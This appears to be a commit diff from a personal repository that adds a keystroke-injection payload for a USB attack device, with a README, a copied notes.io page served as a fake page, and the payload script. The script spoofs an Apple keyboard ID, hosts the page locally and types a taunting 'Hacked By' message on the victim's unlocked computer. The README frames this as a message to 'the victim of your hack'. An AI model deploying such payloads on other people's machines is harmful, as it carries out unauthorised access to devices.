Compare commits
11 Commits
e7147a2b1d
...
86e50b69d2
Author | SHA1 | Date |
---|---|---|
Jules Nieves | 86e50b69d2 | |
Julz4455 | c1612f99c8 | |
Julz4455 | 40834a14b1 | |
Julz4455 | 049d431d58 | |
Julz4455 | 315ba42d69 | |
Julz4455 | f360d8caac | |
Julz4455 | d9e9d271ec | |
Julz4455 | d843fa2b3f | |
Julz4455 | a3d5ed1c3a | |
Julz4455 | cbf4512f17 | |
Julz4455 | 732740a24e |
|
@ -0,0 +1,24 @@
|
||||||
|
# Chromebook Demo Payload
|
||||||
|
|
||||||
|
Author: Julz4455
|
||||||
|
Version: 1.2
|
||||||
|
|
||||||
|
## Description
|
||||||
|
|
||||||
|
Send a certain message to the victim of your hack.
|
||||||
|
This can be a message to lock thier pc or to watch out because of an upcoming hack.
|
||||||
|
|
||||||
|
## Configuration
|
||||||
|
|
||||||
|
Configure by changing the message, header, hacker name, and finale.
|
||||||
|
This can help send a certain message to the victim of your hack.
|
||||||
|
|
||||||
|
## STATUS
|
||||||
|
|
||||||
|
| LED | Status |
|
||||||
|
| ---------| ----------------------------------- |
|
||||||
|
| SETUP | Setting up the ATTACKMODE with HID |
|
||||||
|
| SPECIAL | Setting up Internet and fake page |
|
||||||
|
| ATTACK | The Attack is being carried out |
|
||||||
|
| CLEANUP | Cleaning up the Attack with HID |
|
||||||
|
| FINISH | Attack has been finished |
|
|
@ -0,0 +1,200 @@
|
||||||
|
<!DOCTYPE html>
|
||||||
|
<!--
|
||||||
|
/***
|
||||||
|
* ███╗ ██╗ ██████╗ ████████╗███████╗███████╗ ██╗ ██████╗
|
||||||
|
* ████╗ ██║██╔═══██╗╚══██╔══╝██╔════╝██╔════╝ ██║██╔═══██╗
|
||||||
|
* ██╔██╗ ██║██║ ██║ ██║ █████╗ ███████╗ ██║██║ ██║
|
||||||
|
* ██║╚██╗██║██║ ██║ ██║ ██╔══╝ ╚════██║ ██║██║ ██║
|
||||||
|
* ██║ ╚████║╚██████╔╝ ██║ ███████╗███████║██╗██║╚██████╔╝
|
||||||
|
* ╚═╝ ╚═══╝ ╚═════╝ ╚═╝ ╚══════╝╚══════╝╚═╝╚═╝ ╚═════╝
|
||||||
|
* FAST • EASY • SHORT
|
||||||
|
* hello@notes.io
|
||||||
|
* twitter.com/notesio
|
||||||
|
* fb.com/notesio
|
||||||
|
*/
|
||||||
|
-->
|
||||||
|
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="tr" lang="tr">
|
||||||
|
<head>
|
||||||
|
<meta content="text/html; charset=utf-8" http-equiv="Content-Type"/>
|
||||||
|
<title>Online Notes Services | Fast . Easy . Short | Notes.io </title>
|
||||||
|
<meta name="viewport" content="width=device-width, initial-scale=0.7">
|
||||||
|
<meta name="description"
|
||||||
|
content="Notes.io is a web-based application for taking notes. You can take your notes and share with others by providing the shorten url to a friend.">
|
||||||
|
<meta name="keywords" content="notes,note,online note,online note service,past note,short note,note shortener">
|
||||||
|
<meta name="google-site-verification" content="4Ugv3pjfk9ljCxFSgXA_cITKo3WzpgkcoWPI2wX1Swk"/>
|
||||||
|
<link rel="image_src" href="http://notes.io/theme/macNew/images/logo.png"/>
|
||||||
|
<link href="http://notes.io/theme/macNew/css/notesIO.css" rel="stylesheet" type="text/css"/>
|
||||||
|
<link href="http://notes.io/theme/macNew/css/reset-min.css" rel="stylesheet" type="text/css"/>
|
||||||
|
</head>
|
||||||
|
<body><img src="http://notes.io/theme/macNew/images/background.jpg" class="bg" alt="notes.io background"/>
|
||||||
|
<div class="mainDiv"><div class="whatIsNotesIO"><img src="http://notes.io/theme/macNew/images/whatisnotesio.png" alt="what is notes.io" /></div> <div class="programArea">
|
||||||
|
<table width="100%">
|
||||||
|
<tr>
|
||||||
|
<td class="barsol"></td>
|
||||||
|
|
||||||
|
<td class="barback"><a href="http://notes.io"><img src="http://notes.io/theme/mac/images/logo.png" class="logo"
|
||||||
|
alt="notes.io logo"/></a>
|
||||||
|
<div class="slogan">
|
||||||
|
<img src="http://notes.io/theme/macNew/images/fastEasyShort.png" alt="Fast | Easy | Short"/>
|
||||||
|
|
||||||
|
<p>
|
||||||
|
Notes.io is a Note Shortener // Fast | Easy | Short
|
||||||
|
</p>
|
||||||
|
</div>
|
||||||
|
<div class="menu">
|
||||||
|
|
||||||
|
<input id="btnShort" type="button" class="short" value="short"/>
|
||||||
|
|
||||||
|
<a href="#" class="comingsoon">Coming Soon</a>
|
||||||
|
<input id="btnAccount" type="button" class="account" value="Account"/>
|
||||||
|
<input id="" type="button" class="myNotesDisable" value="Account" /> </div>
|
||||||
|
</td>
|
||||||
|
|
||||||
|
<td class="barsag"></td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
|
||||||
|
<div class="notesArea">
|
||||||
|
<textarea id="notesTextAreaID" class="notesTextArea" rows="2" cols="25" autofocus></textarea>
|
||||||
|
</div>
|
||||||
|
|
||||||
|
<table width="100%">
|
||||||
|
<tr>
|
||||||
|
<td class="notespagebottom1"> </td>
|
||||||
|
|
||||||
|
<td class="notespagebottom2"> </td>
|
||||||
|
|
||||||
|
<td class="notespagebottom3"> </td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
</div>
|
||||||
|
<div class="adverArea">
|
||||||
|
<div class="close"></div>
|
||||||
|
|
||||||
|
<table width="100%">
|
||||||
|
<tr>
|
||||||
|
<td class="barsol"> </td>
|
||||||
|
|
||||||
|
<td class="barback">
|
||||||
|
<center>
|
||||||
|
<img src="http://notes.io/theme/macNew/images/whatisnotesio.png" alt="what is notes.io" class="adverWhatsNotes" />
|
||||||
|
</center>
|
||||||
|
</td>
|
||||||
|
|
||||||
|
<td class="barsag"> </td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
|
||||||
|
<div class="notesArea">
|
||||||
|
<div class="notesTextArea">
|
||||||
|
<p>
|
||||||
|
Notes.io is a web-based application for taking notes. You can take your notes and share with others by providing the shorten url to a friend.
|
||||||
|
</p><br />
|
||||||
|
<p><b>Fast:</b> Notes.io is built for speed and performance. You can take notes quickly and browse your archive.</p>
|
||||||
|
<p><b>Easy:</b> Notes.io doesn’t require installation. Just write and share shorten link!</p>
|
||||||
|
<p><b>Short:</b> Notes.io’s url just 8 character. You’ll get shorten link of your note when you want to share. (<b>Ex:</b> <a href="http://notes.io/q" style="font-size: 12px"> notes.io/q </a></p>
|
||||||
|
<p><b>Contact:</b> hello@notes.io</p>
|
||||||
|
</div>
|
||||||
|
</div>
|
||||||
|
|
||||||
|
<table width="100%">
|
||||||
|
<tr>
|
||||||
|
<td class="notespagebottom1"> </td>
|
||||||
|
|
||||||
|
<td class="notespagebottom2"> </td>
|
||||||
|
|
||||||
|
<td class="notespagebottom3"> </td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
</div>
|
||||||
|
</div>
|
||||||
|
<div id="char" class="char">0 KB</div>
|
||||||
|
<div id="messageback" class="messageback"></div>
|
||||||
|
<div class="messageBOXback"></div>
|
||||||
|
|
||||||
|
<div id="messageBOX" class="message">
|
||||||
|
<table cellpadding="0" cellspacing="0" style="width: 100%">
|
||||||
|
<tr>
|
||||||
|
<td class="auto-style1"> </td>
|
||||||
|
<td class="auto-style2">
|
||||||
|
<div class="closeBTNpopup" id="shortClose"></div>
|
||||||
|
<h1>Long File</h1></td>
|
||||||
|
<td class="auto-style3"> </td>
|
||||||
|
</tr>
|
||||||
|
<tr>
|
||||||
|
<td class="auto-style4"> </td>
|
||||||
|
<td class="auto-style9"><p>For written notes was greater than 18KB Unable to shorten.</p>
|
||||||
|
<p>To be smaller than 18KB, please organize your notes, or sign in.</p></td>
|
||||||
|
<td class="auto-style5"> </td>
|
||||||
|
</tr>
|
||||||
|
<tr>
|
||||||
|
<td class="auto-style6"> </td>
|
||||||
|
<td class="auto-style7"> </td>
|
||||||
|
<td class="auto-style8"> </td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
</div>
|
||||||
|
|
||||||
|
<div id="msgBOXshort" class="message">
|
||||||
|
<table cellpadding="0" cellspacing="0" style="width: 100%">
|
||||||
|
<tr>
|
||||||
|
<td class="auto-style1"> </td>
|
||||||
|
<td class="auto-style2">
|
||||||
|
<div class="closeBTNpopup" id="shortClose"></div>
|
||||||
|
<h1 id="shortNoteH1">Shortened Note Link</h1></td>
|
||||||
|
<td class="auto-style3"> </td>
|
||||||
|
</tr>
|
||||||
|
<tr>
|
||||||
|
<td class="auto-style4"> </td>
|
||||||
|
<td class="auto-style9">
|
||||||
|
<div id="sonuc"><span><img src="http://notes.io/theme/macNew/images/ajax-loader.gif" class="looding"
|
||||||
|
alt="Looding Image"/></span></div>
|
||||||
|
</td>
|
||||||
|
<td class="auto-style5"> </td>
|
||||||
|
</tr>
|
||||||
|
<tr>
|
||||||
|
<td class="auto-style6"> </td>
|
||||||
|
<td class="auto-style7"> </td>
|
||||||
|
<td class="auto-style8"> </td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
</div>
|
||||||
|
<div class="footer">
|
||||||
|
<p>
|
||||||
|
<a href="https://itunes.apple.com/us/app/direct-message-for-whatsapp/id1411992307?ls=1&mt=8" target="_blank">Direct
|
||||||
|
Message for Whatsapp <br/><img src="http://notes.io/theme/banners/directMessageBanner.jpg" width="970" height="250"
|
||||||
|
title="Type number, press the direct message button and start whatsapp chat without saving new contact.Keep it fast,secret and clean."/></a>
|
||||||
|
</p>
|
||||||
|
<p><a href="http://www.sorgulamayap.com" target="_blank">Alan adı sorgulama servisi <br/><img
|
||||||
|
src="http://notes.io/theme/banners/468-60.gif" title="sorgulama yap"/></a></p>
|
||||||
|
<p><a href="http://www.md5generator.org" target="_blank">md5 generator<br/><img
|
||||||
|
src="http://notes.io/theme/banners/banner468-60.jpg" title="md5 generator"/></a></p><a
|
||||||
|
href="http://www.metromedya.com/tr/hizmetlerimiz/ios-uygulama-gelistirme.html" target="_blank">ios
|
||||||
|
programlama </a><a href="http://www.iosprogramlama.com" target=”_blank”>ios programlama</a>
|
||||||
|
<p style="text-align: right;width: 98%">V.2.0.8</p>
|
||||||
|
<div class="socialArea">
|
||||||
|
<p>
|
||||||
|
<iframe src="http://notes.io/socialButton.php" name="myframe" width="162" height="62" frameborder="0"
|
||||||
|
allowtransparency="true"></iframe>
|
||||||
|
</p>
|
||||||
|
<br>
|
||||||
|
<p>Copyright 2018 <a href="http://www.metromedya.com/en" target="_blank">Metromedya</a></p>
|
||||||
|
<p>We'd love to hear from you. Please email us at <a href="mailto:hello@notes.io">hello@notes.io</a></p>
|
||||||
|
|
||||||
|
</div>
|
||||||
|
<script type="text/javascript">var _gaq = _gaq || [];
|
||||||
|
_gaq.push(['_setAccount', 'UA-18039671-1']);
|
||||||
|
_gaq.push(['_trackPageview']);
|
||||||
|
(function () {
|
||||||
|
var ga = document.createElement('script');
|
||||||
|
ga.type = 'text/javascript';
|
||||||
|
ga.async = true;
|
||||||
|
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
|
||||||
|
var s = document.getElementsByTagName('script')[0];
|
||||||
|
s.parentNode.insertBefore(ga, s);
|
||||||
|
})();</script>
|
||||||
|
</div>
|
||||||
|
<script src="http://notes.io/scripts/jquery-1.6.1.min.js" type="text/javascript"></script>
|
||||||
|
<script src="http://notes.io/scripts/notes.js" type="text/javascript"></script>
|
||||||
|
</body>
|
||||||
|
</html>
|
|
@ -0,0 +1,66 @@
|
||||||
|
#!bin/bash
|
||||||
|
|
||||||
|
CUCUMBER PLAID
|
||||||
|
|
||||||
|
LED SETUP
|
||||||
|
GET HOST_IP
|
||||||
|
GET SWITCH_POSITION
|
||||||
|
ATTACKMODE HID ECM_ETHERNET VID_0x05ac PID_0x021e
|
||||||
|
|
||||||
|
MESSAGE="I Will learn to lock my computer"
|
||||||
|
HEADER="Write the following 20 times: ${MESSAGE}"
|
||||||
|
HACKER_NAME="Mr. Robot's Son"
|
||||||
|
FINALE="Understand now?"
|
||||||
|
|
||||||
|
LED SPECIAL
|
||||||
|
|
||||||
|
cd /root/udisk/payloads/$SWITCH_POSITION
|
||||||
|
iptables -A OUTPUT -p udp --dport 80 -j DROP
|
||||||
|
python -m SimpleHTTPServer 80 &
|
||||||
|
|
||||||
|
# wait until port is listening (credit audibleblink)
|
||||||
|
while ! nc -z localhost 80; do sleep 0.2; done
|
||||||
|
|
||||||
|
LED ATTACK
|
||||||
|
Q GUI
|
||||||
|
Q DELAY 5000
|
||||||
|
Q STRING "http://${HOST_IP}/index.html"
|
||||||
|
Q DELAY 750
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 10000
|
||||||
|
Q CONTROL R
|
||||||
|
Q DELAY 10000
|
||||||
|
Q STRING "${HEADER}"
|
||||||
|
Q ENTER
|
||||||
|
Q ENTER
|
||||||
|
|
||||||
|
i="0"
|
||||||
|
while [ $i -lt 19 ]; do
|
||||||
|
Q STRING "${MESSAGE}"
|
||||||
|
Q DELAY 100
|
||||||
|
Q ENTER
|
||||||
|
i=$[$i+1]
|
||||||
|
Q DELAY 200
|
||||||
|
done
|
||||||
|
|
||||||
|
Q ENTER
|
||||||
|
|
||||||
|
Q STRING "${FINALE}"
|
||||||
|
Q ENTER
|
||||||
|
Q STRING "Hacked By: ${HACKER_NAME}"
|
||||||
|
Q ENTER
|
||||||
|
|
||||||
|
LED CLEANUP
|
||||||
|
i="0"
|
||||||
|
while [ $i -lt 30 ]; do
|
||||||
|
Q UP
|
||||||
|
i=$[$i+1]
|
||||||
|
Q DELAY 100
|
||||||
|
done
|
||||||
|
|
||||||
|
LED W 100
|
||||||
|
sync
|
||||||
|
sleep 3
|
||||||
|
sync
|
||||||
|
|
||||||
|
LED FINISH
|
Loading…
Reference in New Issue